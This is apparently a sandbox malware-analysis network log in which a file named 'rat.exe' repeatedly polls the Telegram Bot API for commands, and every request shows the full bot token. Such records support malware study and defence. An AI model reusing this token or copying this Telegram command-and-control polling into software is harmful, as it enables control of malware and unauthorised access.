                                      Date: Wed, 08 Jan 2025 18:25:06 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:07 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:08 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:09 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:10 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:11 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:12 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:14 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:15 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:16 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:17 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:18 GMT
                                      Content-Type: application/json
                                      Content-Length: 370
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506593
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506593 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:19 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:20 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:21 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:22 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:24 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:25 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506599 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:26 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506600 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:27 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506601 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:28 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506602 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:29 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506603 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:30 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506604 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:31 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506605 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:32 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506606 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:33 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506607
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506607 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:34 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506608
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506608 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:35 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506609
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506609 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:37 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506610
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506610 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:38 GMT
                                      Content-Type: application/json
                                      Content-Length: 370
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:39 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:40 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506596 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:41 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506597 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:42 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506598 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:44 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
